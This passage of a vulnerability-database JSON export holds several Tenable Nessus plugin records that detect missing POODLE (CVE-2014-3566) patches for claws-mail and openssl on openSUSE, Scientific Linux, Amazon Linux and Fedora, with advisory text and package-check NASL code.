\"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-29T13:41:51", "references": ["http://lists.opensuse.org/opensuse-updates/2014-11/msg00030.html", "https://bugzilla.opensuse.org/show_bug.cgi?id=903276"], "pluginID": "79106", "description": "Claws Mail was updated to version 3.11.0.\n\nChanges :\n\n + SSLv3 server connections are now disabled by default, in response to the POODLE vulnerability (CVE-2014-3566).\n\n + Several PGP/Core plugin improvements :\n\n - Indicate when a key has been revoked or has expired when displaying signature status.\n\n - When displaying the full information, show the Validity, and the Owner Trust level. Also indicate expired and revoked keys, and revoked UIDs.\n\n - The 'Content-Disposition: attachment' flag in PGP/MIME signed messages has been removed. It was confusing for cetain MUAs.\n\n + A new version of the RSSyl plugin, completely redesigned and rewritten.\n\n + The results of TAB address completion in the Compose window have improved ordering.\n\n + Due to popular demand, use of the Up key in the message body in the Compose window stops at the top of the message body and does not continue up to the header fields. This reverts the behaviour introduced in version 3.10.0.\n\n + In the Compose window, when navigating with the arrow keys, selecting, and thus modifying, the Account selector is now prevented.\n\n + In the Compose window, a mnemonic (s) has been added to the Subject line.\n\n + The Queue folder is highlighted if there are messages in its sub-folders and the tree is collapsed.\n\n + When sorting messages by 'thread date', clicking the 'Date' column header will now toggle between ascending/descending and will not switch to 'date' sorting.\n\n + A new QuickSearch filter has been added that searches a header's content only.\n\n + A Reply-To field has been added to the main Template configuration.\n\n + The menubar can now be hidden, default hotkey: F12.\n\n + Fancy plugin: A user-controlled stylesheet can now be used.\n\n + Python plugin: Add flag attributes to MessageInfo object.\n\n + Python plugin: Make 'account' property of ComposeWindow read/write.\n\n + Libravatar plugin: a network timeout option has been added.\n\n + The tbird2claws.py script, for converting a Thunderbird mailbox to a Claws Mail mailbox, now handles sub-directory recursion.\n\n + Updated translations", "edition": 3, "reporter": "Tenable", "published": "2014-11-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "openSUSE Security Update : claws-mail (openSUSE-SU-2014:1384-1) (POODLE)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["p-cpe:/a:novell:opensuse:claws-mail-devel", "p-cpe:/a:novell:opensuse:claws-mail", "p-cpe:/a:novell:opensuse:claws-mail-debuginfo", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:claws-mail-lang", "p-cpe:/a:novell:opensuse:claws-mail-debugsource"], "modified": "2016-10-13T00:00:00", "id": "OPENSUSE-2014-640.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79106", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-640.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79106);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:26 $\");\n\n script_cve_id(\"CVE-2014-3566\");\n\n script_name(english:\"openSUSE Security Update : claws-mail (openSUSE-SU-2014:1384-1) (POODLE)\");\n script_summary(english:\"Check for the openSUSE-2014-640 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Claws Mail was updated to version 3.11.0.\n\nChanges :\n\n + SSLv3 server connections are now disabled by default, in\n response to the POODLE vulnerability (CVE-2014-3566).\n\n + Several PGP/Core plugin improvements :\n\n - Indicate when a key has been revoked or has expired when\n displaying signature status.\n\n - When displaying the full information, show the Validity,\n and the Owner Trust level. Also indicate expired and\n revoked keys, and revoked UIDs.\n\n - The 'Content-Disposition: attachment' flag in PGP/MIME\n signed messages has been removed. It was confusing for\n cetain MUAs.\n\n + A new version of the RSSyl plugin, completely redesigned\n and rewritten.\n\n + The results of TAB address completion in the Compose\n window have improved ordering.\n\n + Due to popular demand, use of the Up key in the message\n body in the Compose window stops at the top of the\n message body and does not continue up to the header\n fields. This reverts the behaviour introduced in version\n 3.10.0.\n\n + In the Compose window, when navigating with the arrow\n keys, selecting, and thus modifying, the Account\n selector is now prevented.\n\n + In the Compose window, a mnemonic (s) has been added to\n the Subject line.\n\n + The Queue folder is highlighted if there are messages in\n its sub-folders and the tree is collapsed.\n\n + When sorting messages by 'thread date', clicking the\n 'Date' column header will now toggle between\n ascending/descending and will not switch to 'date'\n sorting.\n\n + A new QuickSearch filter has been added that searches a\n header's content only.\n\n + A Reply-To field has been added to the main Template\n configuration.\n\n + The menubar can now be hidden, default hotkey: F12.\n\n + Fancy plugin: A user-controlled stylesheet can now be\n used.\n\n + Python plugin: Add flag attributes to MessageInfo\n object.\n\n + Python plugin: Make 'account' property of ComposeWindow\n read/write.\n\n + Libravatar plugin: a network timeout option has been\n added.\n\n + The tbird2claws.py script, for converting a Thunderbird\n mailbox to a Claws Mail mailbox, now handles\n sub-directory recursion.\n\n + Updated translations\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-11/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=903276\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected claws-mail packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:claws-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:claws-mail-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:claws-mail-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:claws-mail-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:claws-mail-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"claws-mail-3.11.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"claws-mail-debuginfo-3.11.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"claws-mail-debugsource-3.11.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"claws-mail-devel-3.11.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"claws-mail-lang-3.11.0-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"claws-mail\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-29T13:36:19", "references": ["http://www.nessus.org/u?c15fdf7c"], "pluginID": "78536", "description": "This update adds support for the TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade attacks against applications which re-connect using a lower SSL/TLS protocol version when the initial connection indicating the highest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle attack when using block cipher suites in cipher block chaining (CBC) mode. This issue is identified as CVE-2014-3566, and also known under the alias POODLE. This SSL 3.0 protocol flaw will not be addressed in a future update; it is recommended that users configure their applications to require at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see Upstream's Knowledgebase article at https://access.redhat.com/articles/1232123\n\nFor the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.", "edition": 3, "reporter": "Tenable", "published": "2014-10-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Scientific Linux Security Update : openssl on SL5.x i386/x86_64 (POODLE)", "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "modified": "2016-10-19T00:00:00", "id": "SL_20141016_OPENSSL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78536", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78536);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/10/19 14:25:12 $\");\n\n script_cve_id(\"CVE-2014-3566\");\n\n script_name(english:\"Scientific Linux Security Update : openssl on SL5.x i386/x86_64 (POODLE)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566, and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see Upstream's\nKnowledgebase article at https://access.redhat.com/articles/1232123\n\nFor the update to take effect, all services linked to the OpenSSL\nlibrary (such as httpd and other SSL-enabled services) must be\nrestarted or the system rebooted.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1410&L=scientific-linux-errata&T=0&P=1065\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c15fdf7c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"openssl-0.9.8e-31.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-debuginfo-0.9.8e-31.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-devel-0.9.8e-31.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"openssl-perl-0.9.8e-31.el5_11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-19T07:50:15", "references": ["https://alas.aws.amazon.com/ALAS-2014-426.html", "https://aws.amazon.com/amazon-linux-ami/faqs/#lock"], "pluginID": "78484", "description": "Bodo Moller, Thai Duong and Krzysztof Kotowicz of Google discovered a flaw in the design of SSL version 3.0 that would allow an attacker to calculate the plaintext of secure connections, allowing, for example, secure HTTP cookies to be stolen.\n\nhttp://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exp loiting-ssl-30.html\n\nhttps://www.openssl.org/~bodo/ssl-poodle.pdf\n\nSpecial notes :\n\nWe have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with updated openssl packages that fix CVE-2014-3566 .\n\nFor 2014.09 Amazon Linux AMIs, 'openssl-1.0.1i-1.79.amzn1' addresses this CVE. Running 'yum clean all' followed by 'yum update openssl' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, 'openssl-1.0.1i-1.79.amzn1' also addresses this CVE. Running 'yum clean all' followed by 'yum update openssl' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories, 'openssl-1.0.1e-4.60.amzn1' addresses this CVE. Running 'yum clean all' followed by 'yum update openssl' will install the fixed package.\n\nIf you are using a pre-2013.03 Amazon Linux AMI, we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "edition": 4, "reporter": "Tenable", "published": "2014-10-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Amazon Linux AMI : openssl (ALAS-2014-426) (POODLE)", "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["p-cpe:/a:amazon:linux:openssl-devel", "p-cpe:/a:amazon:linux:openssl", "p-cpe:/a:amazon:linux:openssl-debuginfo", "p-cpe:/a:amazon:linux:openssl-perl", "p-cpe:/a:amazon:linux:openssl-static", "cpe:/o:amazon:linux"], "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2014-426.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-426.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78484);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-3566\");\n script_xref(name:\"ALAS\", value:\"2014-426\");\n\n script_name(english:\"Amazon Linux AMI : openssl (ALAS-2014-426) (POODLE)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bodo Moller, Thai Duong and Krzysztof Kotowicz of Google discovered a\nflaw in the design of SSL version 3.0 that would allow an attacker to\ncalculate the plaintext of secure connections, allowing, for example,\nsecure HTTP cookies to be stolen.\n\nhttp://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exp\nloiting-ssl-30.html\n\nhttps://www.openssl.org/~bodo/ssl-poodle.pdf\n\nSpecial notes :\n\nWe have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI\nrepositories with updated openssl packages that fix CVE-2014-3566 .\n\nFor 2014.09 Amazon Linux AMIs, 'openssl-1.0.1i-1.79.amzn1' addresses\nthis CVE. Running 'yum clean all' followed by 'yum update openssl'\nwill install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories,\n'openssl-1.0.1i-1.79.amzn1' also addresses this CVE. Running 'yum\nclean all' followed by 'yum update openssl' will install the fixed\npackage.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories,\n'openssl-1.0.1e-4.60.amzn1' addresses this CVE. Running 'yum clean\nall' followed by 'yum update openssl' will install the fixed package.\n\nIf you are using a pre-2013.03 Amazon Linux AMI, we encourage you to\nmove to a newer version of the Amazon Linux AMI as soon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-426.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update openssl' to update your system. Note that you may need\nto run 'yum clean all' first.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl-1.0.1i-1.79.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-debuginfo-1.0.1i-1.79.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-devel-1.0.1i-1.79.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-perl-1.0.1i-1.79.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-static-1.0.1i-1.79.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-29T13:40:56", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1035851", "https://bugzilla.redhat.com/show_bug.cgi?id=1081224", "https://bugzilla.redhat.com/show_bug.cgi?id=1096041", "https://bugzilla.redhat.com/show_bug.cgi?id=1011098", "https://bugzilla.redhat.com/show_bug.cgi?id=1071327", "https://bugzilla.redhat.com/show_bug.cgi?id=1070480", "https://bugzilla.redhat.com/show_bug.cgi?id=1036346", "https://bugzilla.redhat.com/show_bug.cgi?id=1076387", "https://bugzilla.redhat.com/show_bug.cgi?id=1063035", "https://bugzilla.redhat.com/show_bug.cgi?id=1110255", "https://www.libravatar.org/", "https://bugzilla.redhat.com/show_bug.cgi?id=1153970", "https://bugzilla.redhat.com/show_bug.cgi?id=1010993", "https://bugzilla.redhat.com/show_bug.cgi?id=1079509", "https://bugzilla.redhat.com/show_bug.cgi?id=990650", "https://bugzilla.redhat.com/show_bug.cgi?id=1090300", "https://bugzilla.redhat.com/show_bug.cgi?id=977924", "https://bugzilla.redhat.com/show_bug.cgi?id=1085382", "https://bugzilla.redhat.com/show_bug.cgi?id=569478", "http://www.nessus.org/u?7991626b", "http://www.nessus.org/u?f807f410", "https://bugzilla.redhat.com/show_bug.cgi?id=1079620", "http://www.nessus.org/u?b097c80b", "https://bugzilla.redhat.com/show_bug.cgi?id=982533", "https://bugzilla.redhat.com/show_bug.cgi?id=1078996", "https://bugzilla.redhat.com/show_bug.cgi?id=601982", "https://bugzilla.redhat.com/show_bug.cgi?id=1096895"], "pluginID": "79097", "edition": 4, "description": "- SSLv3 server connections are now disabled by default, in response to the POODLE vulnerability, see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014- 3566.\n\n - Several PGP/Core plugin improvements\n\n - A new version of the RSSyl plugin, completely redesigned and rewritten.\n\n - The results of TAB address completion in the Compose window have improved ordering.\n\n - Due to popular demand, use of the Up key in the message body in the Compose window stops at the top of the message body and does not continue up to the header fields. This reverts the behaviour introduced in version 3.10.0.\n\n - In the Compose window, when navigating with the arrow keys, selecting, and thus modifying, the Account selector is now prevented.\n\n - In the Compose window, a mnemonic (s) has been added to the Subject line.\n\n - The Queue folder is highlighted if there are messages in its sub-folders and the tree is collapsed.\n\n - When sorting messages by 'thread date', clicking the 'Date' column header will now toggle between ascending/descending and will not switch to 'date' sorting.\n\n - A new QuickSearch filter has been added that searches a header's content only. H S : messages which contain S in the value of any header.\n\n - A Reply-To field has been added to the main Template configuration.\n\n - The menubar can now be hidden, default hotkey: F12.\n\n - Fancy plugin: A user-controlled stylesheet can now be used.\n\n - Python plugin: Add flag attributes to MessageInfo object.\n\n - Python plugin: Make 'account' property of ComposeWindow read/write.\n\n - Libravatar plugin: a network timeout option has been added.\n\n - Use 'gnutls_priority' hidden account preference for POP3 and STARTTLS connections, in addition to SMTP.\n\n - RSSyl plugin: Enable use of .netrc to store network credentials.\n\n - The tbird2claws.py script, for converting a Thunderbird mailbox to a Claws Mail mailbox, now handles sub-directory recursion.\n\n - Updated translations\n\n - Various Bugfixes New in 3.10.1 :\n\n - Add an account preference to allow automatically accepting unknown and changed SSL certificates, if they're valid (that is, if the root CA is trusted by the distro).\n\n - RFE 3196, 'When changing quicksearch Search Type, set focus to search input box'\n\n - PGP/Core plugin: Generate 2048 bit RSA keys.\n\n - Major code cleanup.\n\n - Extended claws-mail.desktop with Compose and Receive actions.\n\n - Updated Bulgarian, Brazilian Portuguese, Czech, Dutch, Esperanto, Finnish, French, German,Hebrew, Hungarian, Indonesian, Lithuanian, Slovak, Spanish, and Swedish translations.\n\n - Bug fixes\n\nNew in 3.10.0 :\n\n - Complete SSL certificate chains are now saved, and if built with Libetpan 1.4.1, the IMAP SSL connection's certificate chain is made available. Both of these allow correct certificate verification instead of a bogus 'No certificate issuer found' status.\n\n - Auto-configuration of account email servers, based on SRV records, is now possible. (GLib >= 2.22 is required.)\n\n - Added a preference to avoid automatically drafting emails that are to be sent encrypted, (Configuration/Preferences/Compose/Writing).\n\n - Messages saved as Drafts are now saved as New, highlighting the Drafts folder, in order to draw the attention to unfinished mails there.\n\n - It is now possible to add a 'Replace signature' button to the Compose window toolbar.\n\n - Quotation wrapping and undo/redo in the Compose window has been improved.\n\n - 'Reply to all' now excludes your own address.\n\n - The 'Generate X-Mailer header' option has been renamed 'Add user agent header' and applies to both X-Mailer and X-Newsreader headers.\n\n - Added hidden preferences, 'address_search_wildcard' and 'folder_search_wildcard', to choose between matching from start of the folder name/address or any part of the name. (Activating these options restores the previous behaviour.)\n\n - Added hidden preference 'enable_avatars' to control the internal capture/render process, and which allows disabling it by external plugins for example.\n\n - 'Check for new folders' now only updates the folder list, not updating the contents of folders. If needed, it can be followed by 'Check for new messages'\n\n - When using Redirect, the redirecting account's address is used in the SMTP MAIL FROM instead of the original sender's address.\n\n - NEW: Libravatar plugin, which displays avatars from https://www.libravatar.org/\n\n - Added support for an arbitrary number and sources of 'avatars' and images for email senders, and migrated Face and X-Face headers.\n\n - Avatars are now included when printing mails.\n\n - The GPG keyring can now be used as the source for address auto-completion.\n\n - The vCalendar and RSSyl plugins now have an option to disable SSL certificate verification (and check them by default).\n\n - The ClamAV plugin now pops up an error message only once instead of repeatedly\n\n - Updated the man page and the manual.\n\n - Updated Brazilian Portuguese, British English, Czech, Dutch, Finnish, French, Hebrew, Hungarian, Indonesian, Lithuanian, Slovak, Spanish, and Swedish translations.\n\n - Added Esperanto translation.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "reporter": "Tenable", "published": "2014-11-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Fedora 20 : claws-mail-3.11.1-2.fc20 / claws-mail-plugins-3.11.1-1.fc20 / libetpan-1.6-1.fc20 (2014-14234) (POODLE)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "cpe": ["p-cpe:/a:fedoraproject:fedora:claws-mail", "cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:libetpan", "p-cpe:/a:fedoraproject:fedora:claws-mail-plugins"], "modified": "2016-12-08T00:00:00", "id": "FEDORA_2014-14234.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79097", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14234.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79097);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:31:54 $\");\n\n script_cve_id(\"CVE-2014-3566\");\n script_bugtraq_id(70574);\n script_xref(name:\"FEDORA\", value:\"2014-14234\");\n\n script_name(english:\"Fedora 20 : claws-mail-3.11.1-2.fc20 / claws-mail-plugins-3.11.1-1.fc20 / libetpan-1.6-1.fc20 (2014-14234) (POODLE)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n 